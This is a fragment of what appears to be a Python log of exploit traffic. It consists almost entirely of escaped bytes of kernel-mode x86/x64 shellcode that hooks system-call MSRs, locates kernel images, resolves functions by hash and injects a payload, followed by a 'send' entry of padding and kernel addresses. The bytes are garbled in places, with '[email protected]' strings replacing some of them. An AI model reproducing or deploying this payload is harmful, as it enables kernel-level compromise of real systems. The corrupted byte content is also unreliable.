00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\
\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea 
H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\x
f8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xe
b\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\
\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x
00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\
\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 14, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\
\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\